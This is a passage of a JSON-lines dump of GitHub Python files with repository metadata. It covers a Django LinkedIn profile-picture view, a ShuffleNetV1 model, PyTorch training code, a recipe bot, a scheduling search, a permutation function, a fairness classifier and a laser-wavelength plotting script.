Status code:\", response.status_code)\n\n def linkedinProfile(user_token):\n import requests\n api_endpoint = \"https://api.linkedin.com/v2/me\"\n headers = {\n \"Authorization\": \"Bearer \" + user_token\n }\n params = {\n \"projection\": \"(id,profilePicture(displayImage~:playableStreams))\"\n }\n response = requests.get(api_endpoint, headers=headers, params=params)\n\n # Check the response status code\n if response.status_code == 200:\n # Request successful\n data = response.json()\n profile_picture_url = data[\"profilePicture\"][\"displayImage~\"][\"elements\"][0][\"identifiers\"][0][\"identifier\"]\n return profile_picture_url\n else:\n # Request failed\n profile_picture_url = None\n\n\n if request.user.is_authenticated:\n user_social_auth = UserSocialAuth.objects.get(id=request.user.id)\n\n user_token = user_social_auth.extra_data['access_token']\n user_social_provider = user_social_auth.provider\n\n if user_social_provider == 'linkedin-oauth2': \n profile_picture_base64 = linkedinProfile(user_token)\n return HttpResponse(f'')\n if user_social_provider == 'microsoft-graph': \n profile_picture_base64 = microsoftProfile(user_token)\n return HttpResponse(f'
    {user_social_provider}
    Profile
    login first
    0:\n t -= 1\n s = input().lower()\n res = []\n for i in range(len(s)):\n if s[i] == 't':\n res.append(i)\n if len(res) == 0:\n print(-1)\n elif len(res) == 1:\n print(res[0])\n else:\n print(res[0],res[1],res[-1])","repo_name":"huypham85/Python_PTIT","sub_path":"codecuoiky/cau1_First.py","file_name":"cau1_First.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"19858853312","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom torchsummary import summary\n\n\nclass ShufflenetV1Block(nn.Module):\n def __init__(self,in_ch,out_ch,mid_ch,stride,groups,first_group) -> None:\n super(ShufflenetV1Block,self).__init__()\n assert stride in [1,2]\n self.stride=stride\n self.group=groups \n self.mid_ch=mid_ch\n #notes:has tow hands,stride=1 or 2,\n # --1. stride=1 is add op\n # --2. stride=2 is cat op\n if stride==2:\n out_ch=out_ch-in_ch\n self.conv1=nn.Sequential(\n nn.Conv2d(in_ch,self.mid_ch,kernel_size=1,stride=1,bias=False,groups=1 if first_group else groups),\n nn.BatchNorm2d(self.mid_ch),\n nn.ReLU(inplace=True)\n )\n \n self.conv2=nn.Sequential(\n nn.Conv2d(self.mid_ch,self.mid_ch,kernel_size=3,stride=self.stride,padding=1,groups=self.mid_ch,bias=False),\n nn.BatchNorm2d(self.mid_ch),\n nn.Conv2d(self.mid_ch,out_ch,kernel_size=1,stride=1,padding=0,bias=False,groups=groups),\n nn.BatchNorm2d(out_ch),\n )\n self.relu=nn.ReLU(inplace=True)\n if stride==2:\n self.branch=nn.AvgPool2d(kernel_size=3,stride=2,padding=1)\n def forward(self,x):\n indentity=x\n out=self.conv1(x)\n out=self.channelShuffle(out)\n out=self.conv2(out)\n\n if self.stride==1:\n out=self.relu(out+indentity)\n else:\n indentity=self.branch(indentity)\n out=self.relu(torch.cat((out,indentity),dim=1)) \n return out\n\n def channelShuffle(self,x):\n bs,channelNums,H,W=x.shape\n groups_ch=channelNums//self.group\n x=torch.reshape(x,(bs,groups_ch,self.group,H,W))\n x=torch.transpose(x,1,2)\n x=torch.reshape(x,(bs,channelNums,H,W))\n return x\n\nclass ShufflenetV1(nn.Module):\n def __init__(self,class_nums,in_ch=3,model_size='1.0x',groups=3) -> None:\n super(ShufflenetV1,self).__init__()\n self.stage_repeats=[4,8,4]\n self.mode_size=model_size\n #there are many other cases,and we ignore them,you can build them by yourself.\n if groups==1:\n if model_size=='0.5x':\n self.stage_out_ch=[-1,24,72,144,288]\n elif model_size=='1.0x':\n self.stage_out_ch=[-1,24,144,288,570]\n elif model_size=='2.0x':\n self.stage_out_ch=[-1,48,288,570,1140]\n elif groups==3:\n if model_size=='0.5x':\n self.stage_out_ch=[-1,24,120,240,480]\n elif model_size=='1.0x':\n self.stage_out_ch=[-1,24,240,480,960]\n elif model_size=='2.0x':\n self.stage_out_ch=[-1,48,480,960,1920]\n elif groups==8:\n if model_size=='0.5x':\n self.stage_out_ch=[-1,16,192,384,768]\n elif model_size=='1.0x':\n self.stage_out_ch=[-1,24,384,768,1536]\n elif model_size=='2.0x':\n self.stage_out_ch=[-1,48,768,1536,3072]\n input_ch=self.stage_out_ch[1]\n self.input_layer=nn.Sequential(\n nn.Conv2d(in_ch,input_ch,kernel_size=3,stride=2,padding=3//2, bias=False,groups=3),\n nn.BatchNorm2d(input_ch),\n nn.ReLU(inplace=True)\n )\n self.maxpool=nn.MaxPool2d(kernel_size=3,stride=2,padding=3//2)\n features=[]\n #you can build them one by one\n for inx,repeateNums in enumerate(self.stage_repeats):\n out_ch=self.stage_out_ch[inx+2]\n for i in range(repeateNums):\n stride=2 if i==0 else 1\n firstgroup= inx==0 and i==0\n 
features.append(ShufflenetV1Block(input_ch,out_ch,mid_ch=out_ch//4, stride=stride,groups=groups,first_group=firstgroup))\n input_ch=out_ch\n self.features=nn.Sequential(*features) \n self.globpool=nn.AdaptiveAvgPool2d(1) \n self.classify=nn.Conv2d(self.stage_out_ch[-1],class_nums,kernel_size=1, bias=False) \n\n def forward(self,x):\n x=self.input_layer(x)\n x=self.maxpool(x)\n x=self.features(x)\n x=self.globpool(x)\n x=self.classify(x)\n\nif __name__==\"__main__\":\n input=torch.ones([2,3,224,224])\n model=ShufflenetV1(10)\n # model=ShufflenetV1Block(240,240,240//4,stride=1,groups=3,first_group=False)\n # res=model(input)\n # print(res.shape)\n summary(model.to(\"cuda\"),(3,224,224))\n","repo_name":"dongguazi/Classic-Network","sub_path":"NetWork/ShuffleNet/ShuffleNetV1/ShuffleNetV1.py","file_name":"ShuffleNetV1.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73902759489","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport torchvision\nimport torchvision.transforms as transforms\n\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef train(model, criterion, optimizer, train_set, val_set, num_epochs, batch_size, device, attn=True):\n model.to(device)\n train_loader = torch.utils.data.DataLoader(train_set, \n batch_size=batch_size,\n shuffle=True, num_workers=2)\n\n val_loader = torch.utils.data.DataLoader(val_set, \n batch_size=batch_size,\n shuffle=False, num_workers=2)\n train_losses = []\n train_accs = []\n val_losses = []\n val_accs = []\n\n size = int(len(train_set) / batch_size)\n\n for epoch in range(num_epochs):\n running_loss = 0.0\n running_acc = 0.0\n model.train()\n for i, (_, inputs, labels) in enumerate(train_loader):\n # get the inputs and labels\n inputs = inputs.to(device)\n labels = labels.to(device)\n \n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n if attn:\n class_pred, latent_mask = model(inputs)\n else:\n class_pred = model(inputs)\n loss = criterion(class_pred, labels)\n loss.backward()\n optimizer.step()\n\n # calculate running loss and acc\n running_loss += loss.item()\n _, predicted = torch.max(class_pred.data, 1)\n running_acc += (predicted == labels).sum().item() / labels.size(0)\n \n # print every (size / 5) mini-batches\n if i % (size / 5) == (size / 5) - 1:\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / (size / 5)))\n train_losses.append(running_loss / (size / 5))\n train_accs.append(running_acc / (size / 5))\n running_loss = 0.0\n running_acc = 0.0\n\n val_loss, val_acc = get_loss_and_acc(model, criterion, \n val_loader, device, attn)\n \n val_losses.append(val_loss)\n val_accs.append(val_acc)\n \n print('Finished Training')\n return train_losses, train_accs, val_losses, val_accs\n\n\ndef get_loss_and_acc(model, criterion, data_loader, device, attn=True):\n correct = 0\n total = 0\n running_loss = 0\n i = 0\n model.eval()\n with torch.no_grad():\n for i, (_, inputs, labels) in enumerate(data_loader):\n # get the inputs and labels\n inputs = inputs.to(device)\n labels = labels.to(device)\n \n # forward\n if attn:\n class_pred, latent_mask = model(inputs)\n else:\n class_pred = model(inputs)\n \n # loss\n loss = criterion(class_pred, labels)\n running_loss += loss.item()\n \n # accuracy\n _, predicted = torch.max(class_pred.data, 1)\n total += labels.size(0)\n i += 1\n correct += (predicted 
== labels).sum().item()\n\n print('Accuracy: %f ' % (correct / total))\n print('Loss: %f ' % (running_loss / i))\n\n return running_loss / i, correct / total\n\n\ndef get_test_acc(model, test_loader, device):\n model.eval()\n correct = 0\n total = 0\n with torch.no_grad():\n for i, (_, inputs, labels) in enumerate(test_loader):\n inputs = inputs.to(device)\n labels = labels.to(device)\n class_pred, latent_mask = model(inputs)\n _, predicted = torch.max(class_pred.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n print('Accuracy of the network on the 10000 test images: %f' % (correct / total))\n\n\ndef get_test_class_acc(model, classes, test_loader, device):\n model.eval()\n class_correct = list(0. for i in range(10))\n class_total = list(0. for i in range(10))\n with torch.no_grad():\n for i, (_, inputs, labels) in enumerate(test_loader):\n inputs = inputs.to(device)\n labels = labels.to(device)\n class_pred, latent_mask = model(inputs)\n _, predicted = torch.max(class_pred, 1)\n c = (predicted == labels).squeeze()\n for i in range(4):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\n for i in range(len(classes)):\n print('Accuracy of %5s : %2f' % (classes[i], class_correct[i] / class_total[i]))\n","repo_name":"asetoodehnia/AdaHAN-for-Image-Classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33215141897","text":"import random\n\nimport requests\n\nfrom lib.cog import Cog\nfrom lib.command import Command, makeCommand\n\n\nclass Food2fork(Cog):\n def __init__(self, bot):\n super().__init__(bot)\n self.settings = self.bot.settings[\"module\"][\"food2fork\"]\n self.base_url = \"https://food2fork.com/api/search?key={apikey}&q={search}\"\n\n\n @makeCommand(name=\"food\", description=\" return random recipe related to the search\")\n async def food(self, c: Command):\n if len(c.message) >= 3:\n res = await self.food_search(c.message)\n if res != None:\n await self.send_message(\"{} {} ({}/{})\".format(*res[0]))\n else:\n await self.send_message(\"Couldn't find anything for {}\".format(c.message))\n\n async def food_search(self, search):\n results = []\n search = requests.utils.quote(search)\n query = requests.get(\n self.base_url.format(apikey=self.settings[\"key\"], search=search)\n )\n print(query)\n if query.status_code == 200:\n query = query.json()\n try:\n total = len(query[\"recipes\"])\n num = random.randint(0, total)\n results.append([\n query[\"recipes\"][num][\"title\"],\n query[\"recipes\"][num][\"f2f_url\"],\n num,\n total\n ])\n return results\n except (IndexError, KeyError) as error:\n self.bot.log.warning(error)\n","repo_name":"JohnRipper/quantum","sub_path":"modules/food2fork.py","file_name":"food2fork.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"1033690015","text":"import json\n\n\nclass Node:\n def __init__(self, dict_data: dict, node_number, next_numbers: list, prev=None):\n self.prev = prev\n self.node_number = node_number\n self.next_numbers = next_numbers.copy()\n self.next_numbers.remove(node_number)\n if prev is None:\n self.c = 0\n self.value = 0\n else:\n self.c = prev.c\n self.value = prev.value\n self.c += dict_data['D'][node_number]\n if dict_data['I'][node_number] > self.c:\n self.value += (dict_data['I'][node_number] - 
self.c) * dict_data['a'][node_number]\n else:\n self.value += (self.c - dict_data['I'][node_number]) * dict_data['b'][node_number]\n\n def __repr__(self):\n temp = self\n res = ''\n while temp:\n res = ' -> {} ({})'.format(temp.node_number, temp.value) + res\n temp = temp.prev\n res = 'start' + res\n return res\n\n\ndef display_table(d: dict):\n n = len(d['I'])\n print(' ', end='')\n for i in range(n):\n print('{: >6}'.format(i), end='')\n print()\n for k in d.keys():\n print(' ' + k, end='')\n for i in d[k]:\n print('{: >6}'.format(i), end='')\n print()\n\n\n# def check_route(node: Node, maybe_min, maybe_max: Node, trash):\n# if node.next_numbers:\n# if maybe_max.value <= node.value:\n# trash.append(node)\n# else:\n# maybe_min.append(node)\n# elif maybe_max.value > node.value:\n# trash.append(maybe_max)\n# maybe_max = node\n# for i in maybe_min.copy():\n# if i.value >= maybe_max.value:\n# maybe_min.remove(i)\n# trash.append(i)\n# else:\n# trash.append(node)\n# return maybe_min, maybe_max, trash\n\ndef check_route2(node: Node, maybe_min, maybe_max: Node):\n if node.next_numbers:\n if maybe_max.value > node.value:\n maybe_min.append(node)\n elif maybe_max.value > node.value:\n maybe_max = node\n for i in maybe_min:\n if i.value >= maybe_max.value:\n maybe_min.remove(i)\n return maybe_min, maybe_max\n\n\ndef find_min_route(data, maybe_min, maybe_max: Node, trash=None, k=0):\n if trash is None:\n trash = []\n while True:\n if not maybe_min:\n return {\n 'top route': maybe_max.__str__(),\n # 'trash': trash,\n 'iter': k\n }\n min_value = min(maybe_min, key=lambda x: x.value)\n maybe_min.remove(min_value)\n if min_value.value >= maybe_max.value:\n del min_value\n continue\n\n for i in min_value.next_numbers:\n node = Node(data, i, min_value.next_numbers, min_value)\n k += 1\n if len(node.next_numbers) == 1:\n node = Node(data, node.next_numbers[0], node.next_numbers, node)\n k += 1\n # maybe_min, maybe_max, trash = check_route(node, maybe_min, maybe_max, trash)\n # maybe_min, maybe_max = check_route2(node, maybe_min, maybe_max)\n if node.next_numbers:\n if maybe_max.value > node.value:\n maybe_min.append(node)\n elif maybe_max.value > node.value:\n maybe_max = node\n\n\n\ndef find(data: dict):\n k = 0\n maybe_min = []\n n = len(data['I'])\n for i in range(n):\n node = Node(data, i, list(range(n)))\n k += 1\n maybe_min.append(node)\n node = maybe_min.pop(0)\n for i in range(1, n):\n node = Node(data, i, node.next_numbers, node)\n k += 1\n maybe_max = node\n return find_min_route(data, maybe_min, maybe_max)\n\n\nif __name__ == '__main__':\n d: dict\n with open('input.json', 'r') as f:\n d = json.load(f)\n display_table(d)\n a = find(d)\n print(a['top route'])\n # trash = sorted(a['trash'], key=lambda x: x.value)\n # print(trash)\n # for i in trash:\n # print(i)\n","repo_name":"karpokate/Lab8_MMO","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16304647857","text":"from pytorch_lightning import LightningModule\nfrom torch import nn\nfrom torch.optim import Adam, RMSprop\nimport torch\nfrom torchmetrics import Accuracy\n \nimport torch.nn.functional as F\nfrom metrics import DemParityMetric, EqualizedOdds, EqualOpportunity\nfrom DRO.robust_loss import RobustLoss\n\n\n\n\nclass Classifier(LightningModule):\n \"\"\"\n Gender predictor for the UCI Adult datatset\n\n params:\n use_robust: boolean. Use DRO loss if true.\n robust_method: enum. 
values `chi-square` or `cvar`\n input_size: int. Input size. Default = 97\n output_size: int. Output size. Default = 1\n \"\"\"\n\n def __init__(self, input_size=97, output_size=1, lr=.001, betas=None, use_robust=False, robust_method='chi-square') -> None:\n super(Classifier, self).__init__()\n\n self.model = nn.Linear(input_size, output_size) \n\n self.lr = lr\n self.robust_loss = RobustLoss(geometry=robust_method, size=1 if robust_method=='chi-square' else .9, reg=0.01)\n self.loss = nn.BCEWithLogitsLoss() \n\n # metrics to logged \n self.train_acc = Accuracy(task=\"binary\", multiclass=False)\n self.val_acc = Accuracy(task=\"binary\", multiclass=False)\n self.test_acc = Accuracy(task=\"binary\", multiclass=False) \n self.dp = DemParityMetric()\n\n self.dp_test = DemParityMetric()\n self.eo_test = EqualOpportunity()\n self.eod_test = EqualizedOdds()\n\n\n self.dp_train = DemParityMetric()\n\n self.use_robust = use_robust\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n x = self.model(x).squeeze()\n sigmoid_output = self.sigmoid(x)\n return x, sigmoid_output\n\n def loss_fn(self, outputs, targets):\n if not self.use_robust:\n loss = self.loss(outputs, targets)\n else: \n loss = F.binary_cross_entropy_with_logits(outputs, targets, reduction='none')\n self.log(\"acc/n_train\", loss.mean())\n loss = self.robust_loss(loss)\n self.log(\"acc/r_loss\", loss)\n return loss\n\n\n def training_step(self, batch, _): \n x, y, s = batch\n \n output, sigmoid_output = self(x)\n\n loss = self.loss_fn(output, y)\n\n self.train_acc.update(sigmoid_output, y.long())\n\n self.log(\"acc/train\", self.train_acc,\n prog_bar=True, on_epoch=True, on_step=False)\n self.log(\"loss/train\", loss)\n\n self.dp_train.update(sigmoid_output, s)\n self.log(\"dp/train\", self.dp_train, prog_bar=False,\n on_epoch=True, on_step=False)\n\n return loss\n\n def validation_step(self, batch, _):\n \n x, y, s = batch\n\n # print(s)\n output, sigmoid_output = self(x)\n\n loss = self.loss_fn(output, y)\n\n self.val_acc.update(sigmoid_output, y.long())\n\n self.dp.update(sigmoid_output, s)\n\n self.log(\"acc/val\", self.val_acc, prog_bar=True)\n self.log(\"loss/val\", loss, prog_bar=False)\n self.log(\"dp/val\", self.dp, prog_bar=False)\n\n def test_step(self, batch, _):\n x, y, s = batch\n\n _, sigmoid_output = self(x)\n\n #loss = self.loss(output, y)\n\n self.test_acc.update(sigmoid_output, y.long())\n self.dp_test.update(sigmoid_output, s)\n self.eo_test.update(sigmoid_output, y, s)\n self.eod_test.update(sigmoid_output, y, s)\n\n self.log(\"acc/test\", self.test_acc)\n self.log(\"dp/test\", self.dp_test)\n self.log(\"eo/test\", self.eo_test)\n self.log(\"eod/test\", self.eod_test)\n # self.log(\"test/loss\", loss)\n\n def configure_optimizers(self):\n optim = Adam(self.model.parameters(), self.lr)\n return optim\n \n def predict(self, x): \n _, preds = self(x) \n ans = (preds > .5).long()\n return ans\n","repo_name":"patrikken/fair-dsr","sub_path":"src/predictor_y.py","file_name":"predictor_y.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"41172495427","text":"import math\n\ndef next_permutation(s):\n # find tail: longest sequence of ascending items from end\n tail = len(s) - 1\n while tail > 0 and s[tail-1] >= s[tail]:\n tail -= 1\n # if tail is whole array, then we're already on final permutation\n if tail == 0:\n return False\n # otherwise, swap item before tail with next larger item from tail\n ins = s[tail-1]\n 
t = len(s)-1\n while s[t] <= ins:\n t -= 1\n ext = s[t]\n s[tail-1],s[t] = ext,ins\n # reverse order of tail\n t = len(s)-1\n for i in range((t-tail)//2+1):\n s[tail+i],s[t-i] = s[t-i],s[tail+i]\n return True\n \n \n\nif __name__ == \"__main__\":\n a = [1,2,3,4,5]\n i = 0\n print(a)\n while next_permutation(a):\n print(a)\n i+=1\n","repo_name":"ntabris/hackerrank-exercises","sub_path":"c/perm-string.py","file_name":"perm-string.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3666796428","text":"__author__ = 'jwbritto'\n\nimport sys\nimport numpy as np\nimport matplotlib.pylab as plt\nimport matplotlib\nfrom matplotlib.transforms import Bbox, TransformedBbox, \\\n blended_transform_factory\nfrom mpl_toolkits.axes_grid1.inset_locator import BboxPatch, BboxConnector,\\\n BboxConnectorPatch\n\nclass Laser:\n \"\"\"Laser properties\n \"\"\"\n def __init__(self, lambdas, bw, label, type):\n self.type = type\n self.label = label\n self.bw = bw\n if type==\"low_power\":\n self.l1 = np.array([ [x-bw/2, x+bw/2] for x in lambdas])\n if type==\"high_power\":\n self.l1 = np.array([lambdas[0]-bw/2, lambdas[0]+bw/2])\n self.l2 = self.l1/2\n self.l3 = self.l1/3\n self.l4 = self.l1/4\n\n @classmethod\n def high_power(cls, lambda0, bw, label):\n \"\"\"high power lasers support harmonics\n\n :param lambda0: center wavelength, float in nm\n :param bw: gain bandwidth, float in nm\n :param label: laser label, str\n \"\"\"\n return cls([lambda0], bw, label, type=\"high_power\")\n @classmethod\n def low_power(cls, lambdas, bw, label):\n \"\"\"lower power lasers (direct only)\n\n :param lambdas: center wavelengths, [float] in nm\n :param bw: tuning bandwidth, float in nm\n :param label: laser label, str\n \"\"\"\n return cls(lambdas, bw, label, type=\"low_power\")\n\n def __str__(self):\n s = \"{label}:\\n\".format(label=self.label)\n if self.type == \"low_power:\":\n s = s + \" L1={} nm\\n\".format(self.l0)\n return s\n if self.type == \"high_power:\":\n s = s + \" L1={} nm\\n\".format(self.l1)\n s = s + \" L2={} nm\\n\".format(self.l2)\n s = s + \" L3={} nm\\n\".format(self.l3)\n s = s + \" L4={} nm\\n\".format(self.l4)\n return s\n else:\n return \"\"\n\nclass Species:\n \"\"\"Atomic species wavelengths\n \"\"\"\n def __init__(self, name, colors):\n \"\"\"\n :param name: label for ion\n :param colors: dictinary of {{wavelength: \"descriptor\"}, ...}\n \"\"\"\n self.name = name\n self.colors = colors\n\n def __str__(self):\n stmp = [\"{}:,{:.1f}nm, \".format(v, k) for k,v in self.colors.items()]\n s = \"{name} :: {colors}\".format(name=self.name, colors=stmp)\n return s\n\ndef connect_bbox(bbox1, bbox2,\n loc1a, loc2a, loc1b, loc2b,\n prop_lines, prop_patches=None):\n \"\"\"\n\n :param bbox1:\n :param bbox2:\n :param loc1a:\n :param loc2a:\n :param loc1b:\n :param loc2b:\n :param prop_lines:\n :param prop_patches:\n :return:\n \"\"\"\n #http://matplotlib.org/examples/pylab_examples/axes_zoom_effect.html\n if prop_patches is None:\n prop_patches = prop_lines.copy()\n prop_patches[\"alpha\"] = prop_patches.get(\"alpha\", 1)*0.2\n\n c1 = BboxConnector(bbox1, bbox2, loc1=loc1a, loc2=loc2a, **prop_lines)\n c1.set_clip_on(False)\n c2 = BboxConnector(bbox1, bbox2, loc1=loc1b, loc2=loc2b, **prop_lines)\n c2.set_clip_on(False)\n\n bbox_patch1 = BboxPatch(bbox1, **prop_patches)\n bbox_patch2 = BboxPatch(bbox2, **prop_patches)\n\n p = BboxConnectorPatch(bbox1, bbox2,\n #loc1a=3, loc2a=2, loc1b=4, loc2b=1,\n 
loc1a=loc1a, loc2a=loc2a, loc1b=loc1b, loc2b=loc2b,\n **prop_patches)\n p.set_clip_on(False)\n\n return c1, c2, bbox_patch1, bbox_patch2, p\n\n\ndef zoom_effect01(ax1, ax2, xmin, xmax, **kwargs):\n \"\"\"\n ax1 : the main axes\n ax1 : the zoomed axes\n (xmin,xmax) : the limits of the colored area in both plot axes.\n\n connect ax1 & ax2. The x-range of (xmin, xmax) in both axes will\n be marked. The keywords parameters will be used ti create\n patches.\n http://matplotlib.org/examples/pylab_examples/axes_zoom_effect.html\n \"\"\"\n\n trans1 = blended_transform_factory(ax1.transData, ax1.transAxes)\n trans2 = blended_transform_factory(ax2.transData, ax2.transAxes)\n\n bbox = Bbox.from_extents(xmin, 0, xmax, 1)\n\n mybbox1 = TransformedBbox(bbox, trans1)\n mybbox2 = TransformedBbox(bbox, trans2)\n\n prop_patches=kwargs.copy()\n prop_patches[\"ec\"]=\"none\"\n prop_patches[\"alpha\"]=0.2\n\n c1, c2, bbox_patch1, bbox_patch2, p = \\\n connect_bbox(mybbox1, mybbox2,\n loc1a=3, loc2a=2, loc1b=4, loc2b=1,\n prop_lines=kwargs, prop_patches=prop_patches)\n\n ax1.add_patch(bbox_patch1)\n ax2.add_patch(bbox_patch2)\n ax2.add_patch(c1)\n ax2.add_patch(c2)\n ax2.add_patch(p)\n\n return c1, c2, bbox_patch1, bbox_patch2, p\n\n\ndef zoom_effect02(ax1, ax2, **kwargs):\n \"\"\"\n ax1 : the main axes\n ax1 : the zoomed axes\n\n Similar to zoom_effect01. The xmin & xmax will be taken from the\n ax1.viewLim.\n http://matplotlib.org/examples/pylab_examples/axes_zoom_effect.html\n \"\"\"\n\n tt = ax1.transScale + (ax1.transLimits + ax2.transAxes)\n trans = blended_transform_factory(ax2.transData, tt)\n\n mybbox1 = ax1.bbox\n mybbox2 = TransformedBbox(ax1.viewLim, trans)\n\n prop_patches=kwargs.copy()\n prop_patches[\"ec\"]=\"none\"\n prop_patches[\"alpha\"]=0.2\n\n c1, c2, bbox_patch1, bbox_patch2, p = \\\n connect_bbox(mybbox1, mybbox2,\n loc1a=3, loc2a=2, loc1b=4, loc2b=1,\n prop_lines=kwargs, prop_patches=prop_patches)\n\n ax1.add_patch(bbox_patch1)\n ax2.add_patch(bbox_patch2)\n ax2.add_patch(c1)\n ax2.add_patch(c2)\n ax2.add_patch(p)\n\n return c1, c2, bbox_patch1, bbox_patch2, p\n\n\ndef plotit_all(lasers, ions):\n plt.clf()\n fig = plt.figure(1, figsize=(10,2))\n plt.subplots_adjust(left=0.25, right=0.95, top=0.95, bottom=0.15)\n ax1 = plt.subplot(111)\n\n # plot ion colors\n i=0\n colorlist = ['blue','green','red','cyan','magenta','orange','yellow']\n for ion in ions:\n for nm, label in ion.colors.items():\n s = \"{} {}\".format(ion.name, label)\n line = ax1.axvline(x=nm, color=colorlist[i], linewidth=2, alpha=0.5)\n #txt = ax1.text(x=nm, y=i+.5, s=s, rotation=90\")\n line.set_label(ion.name)\n i+=1\n ax1.legend(loc='upper center',mode='expand', ncol=i)\n\n # plot laser colors\n i = 0\n xmax = 0\n yticks = []; yticklabels = []\n xticks = []; xticklabels = []\n laser_alpha = 1\n for r in lasers:\n yticks.append(0.5 + i)\n yticklabels.append(r.label)\n # fundamental\n if r.type == \"low_power\":\n # there's a list of wavelengths for a low power laser class\n xbars = [(x[0], x[1]-x[0]) for x in r.l1]\n xmax = np.max([xmax, np.max(r.l1)])\n ax1.broken_barh(xbars , (i, 1), facecolors='grey',\n alpha=laser_alpha, linewidth=0)\n if r.type == \"high_power\":\n xbars = [(r.l1[0], r.l1[1]-r.l1[0])]\n xmax = np.max([xmax, r.l1[1]])\n b1 = ax1.broken_barh(xbars , (i, 1), facecolors='red',\n alpha=laser_alpha, linewidth=0,\n label=\"fundamental\")\n\n # second and higher harmonics only for high-power lasers\n if r.type == \"high_power\":\n # second harmonic\n xbars = [(r.l2[0], r.l2[1]-r.l2[0])]\n b2 = 
ax1.broken_barh(xbars, (i, 1), facecolors='green',\n alpha=laser_alpha, linewidth=0,\n label=\"2nd harmonic\")\n # third harmonic\n xbars = [(r.l3[0], r.l3[1]-r.l3[0])]\n b3= ax1.broken_barh(xbars, (i, 1), facecolors='blue',\n alpha=laser_alpha, linewidth=0,\n label=\"3rd harmonic\")\n # fourth harmonic\n xbars = [(r.l4[0], r.l4[1]-r.l4[0])]\n b4 = ax1.broken_barh(xbars, (i, 1), facecolors='purple',\n alpha=laser_alpha, linewidth=0,\n label='4th harmonic')\n i += 1\n\n yticks.append(1 + i)\n yticklabels.append(\"Sources:\")\n\n # spruce up axes\n ax1.grid(True)\n ax1.set_yticks(yticks)\n ax1.set_yticklabels(yticklabels)\n ax1.set_xlim([125, xmax])\n ax1.set_xlabel(\"wavelength [nm]\")\n plt.show()\n\n\ndef plotit_uv_zoom(lasers, species, fig_title=''):\n nspecies = len(species)\n nions = len(ion_qubits)\n\n xstretch = 0.1\n zoom_x_max = 425\n xmin = 225\n plt.clf()\n plt.figure(1, figsize=(5,5))\n plt.subplots_adjust(left=0.25, right=0.95, top=0.70, bottom=0.1)\n ax1 = plt.subplot(211)\n ax2 = plt.subplot(212)\n\n i = 0\n yticks = []; yticklabels = []\n xticks = []; xticklabels = []\n\n xmax = 0\n for r in lasers:\n yticks.append(0.5 + i)\n yticklabels.append(r.label)\n # fundamental\n if r.type == \"low_power\":\n # there's a list of wavelengths for a low power laser class\n xbars = [(x[0], x[1]-x[0]) for x in r.l1]\n xmax = np.max([xmax, np.max(r.l1)])\n if r.type == \"high_power\":\n xbars = [(r.l1[0], r.l1[1]-r.l1[0])]\n xmax = np.max([xmax, r.l1[1]])\n ax1.broken_barh(xbars , (i, 1), facecolors='red')\n ax2.broken_barh(xbars , (i, 1), facecolors='red')\n\n # second and higher harmonics only for high-power lasers\n if r.type == \"high_power\":\n # second harmonic\n xbars = [(r.l2[0], r.l2[1]-r.l2[0])]\n ax1.broken_barh(xbars , (i, 1), facecolors='green')\n ax2.broken_barh(xbars , (i, 1), facecolors='green')\n # third harmonic\n xbars = [(r.l3[0], r.l3[1]-r.l3[0])]\n ax1.broken_barh(xbars , (i, 1), facecolors='blue')\n ax2.broken_barh(xbars , (i, 1), facecolors='blue')\n # fourth harmonic\n xbars = [(r.l4[0], r.l4[1]-r.l4[0])]\n ax1.broken_barh(xbars , (i, 1), facecolors='purple')\n ax2.broken_barh(xbars , (i, 1), facecolors='purple')\n i += 1\n\n # plot ion colors\n lbl_sqz = 3 # labels are too close, nm\n sqzd = False\n all_colors = [] # list of all ion colors\n for ion in species:\n for nm, label in ion.colors.items():\n sqzd = any( [(abs(x-nm)500mW tuning)\\n\" \\\n \"GREEN is doubled\\n\" \\\n \"BLUE is trippled\\n\" \\\n \"PURPLE is quadrupled\"\n plt.figtext(x=0.75, y=0.99, s=caption_right,\n horizontalalignment=\"left\", verticalalignment='top')\n ax1.grid(True)\n ax1.set_yticks(yticks)\n ax1.set_yticklabels(yticklabels)\n ax2.set_xlim([xmin*(1-xstretch), xmax*(1+xstretch)])\n ax2.set_ylim([0,i+0.5])\n ax2.grid(True)\n ax2.set_yticks(yticks)\n ax2.set_yticklabels(yticklabels)\n ax2.set_ylim([0,i+0.5])\n ax2.set_xlabel(\"wavelength [nm]\")\n ax1.set_xlim([xmin, zoom_x_max])\n zoom_effect01(ax1, ax2, xmin, zoom_x_max)\n plt.figtext(x=.5, y=0.99, s=fig_title,\n horizontalalignment=\"center\", verticalalignment='top',\n weight='bold')\n plt.show()\n\n# diode source data from\n# http://tf.boulder.nist.gov/general/pdf/2765.pdf\n#\nlasers_nist = [Laser.high_power(1118, 40, \"1118nm OPSL\"),\n Laser.high_power(1156, 60, \"1156nm OPSL K3381\"),\n Laser.high_power(1200, 40, \"1200nm OPSL\"),\n Laser.high_power(705, 30, \"705nm OPSL 